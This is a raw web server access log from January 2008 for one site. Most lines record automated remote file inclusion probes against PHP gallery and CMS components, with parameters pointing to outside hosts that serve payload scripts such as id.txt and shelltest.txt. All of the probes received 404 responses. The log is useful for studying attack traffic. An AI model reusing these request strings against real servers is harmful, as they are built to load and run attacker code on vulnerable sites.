216.246.28.145 - - [06/Jan/2008:20:58:17 -0800] "GET //runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:20:58:17 -0800] "GET /logs//runcms/modules/newbb_plus/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.17 - - [06/Jan/2008:20:58:20 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:20:58:33 -0800] "GET /order/login.php?svr_rootscript=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:20:58:35 -0800] "GET /logs/order/login.php?svr_rootscript=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:56 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:56 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:57 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:57 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:57 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:00:57 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:01:04 -0800] "GET /logs/access_071212.log//public/runcms//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [06/Jan/2008:21:03:01 -0800] "GET /config.php?path_to_root=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [06/Jan/2008:21:04:25 -0800] "GET /config.php?path_to_root=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:05:03 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:05:03 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:05:03 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:06:29 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:08:15 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:08:16 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:08:17 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [06/Jan/2008:21:09:32 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [06/Jan/2008:21:09:37 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [06/Jan/2008:21:09:37 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:09:48 -0800] "GET /logs/access_071212.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:09:48 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:09:48 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:10:43 -0800] "GET /logs/access_071110.log/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:10:43 -0800] "GET /logs/access_071110.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:13:46 -0800] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:21:14:34 -0800] "GET /config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:21:14:35 -0800] "GET /config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:17:36 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:17:36 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:17:36 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:21:10 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:21:11 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:21:11 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:21:23:10 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:21:23:10 -0800] "GET /logs/config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:21:25:33 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.81 - - [06/Jan/2008:21:26:28 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.15.135.138 - - [06/Jan/2008:21:29:29 -0800] "GET /logs/access_071229.log/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=www.lotromp.com/kafegaul/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.135.138 - - [06/Jan/2008:21:29:29 -0800] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=www.lotromp.com/kafegaul/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:21:33:48 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:21:37:31 -0800] "GET /admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:21:37:31 -0800] "GET /logs/admin.php?include_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:38:23 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.229.91.22 - - [06/Jan/2008:21:40:40 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:43:19 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:43:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:43:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:43:49 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:43:49 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:43:49 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:44:49 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:44:49 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:44:50 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:44:54 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:44:57 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:45:12 -0800] "GET /logs/access_071110.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:21:45:50 -0800] "GET /index.php?cmd&dir=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.200.83.90 - - [06/Jan/2008:21:45:50 -0800] "GET /logs/index.php?cmd&dir=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:46:17 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.50.194.34 - - [06/Jan/2008:21:46:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:46:53 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:46:53 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:46:53 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:21:46:57 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:21:50:24 -0800] "GET /logs/access_071110.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.35 - - [06/Jan/2008:21:50:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.77 - - [06/Jan/2008:21:50:31 -0800] "GET /logs/access_071130.log HTTP/1.0" 200 58566 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:55:20 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:21:55:54 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.170 - - [06/Jan/2008:21:59:21 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:22:00:05 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:22:01:33 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
132.229.91.22 - - [06/Jan/2008:22:02:26 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [06/Jan/2008:22:02:27 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [06/Jan/2008:22:02:37 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:22:11:14 -0800] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.1" 200 3451 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.178.176.36 - - [06/Jan/2008:22:13:46 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.178.176.36 - - [06/Jan/2008:22:13:46 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.178.176.36 - - [06/Jan/2008:22:13:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.205.79.5 - - [06/Jan/2008:22:13:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.205.79.5 - - [06/Jan/2008:22:13:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.205.79.5 - - [06/Jan/2008:22:13:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:22:17:10 -0800] "GET /minamijewelry/?N=D HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:28 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:32 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
83.205.229.225 - - [06/Jan/2008:22:17:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:18:35 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:18:35 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:18:35 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [06/Jan/2008:22:19:01 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.144.55.219 - - [06/Jan/2008:22:19:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:32 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:32 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:32 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:37 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:52 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:52 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:19:52 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:20:07 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:20:19 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:22:16 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:22:16 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:22:17 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:22:23 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:22:23 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:22:23 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:22:28 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
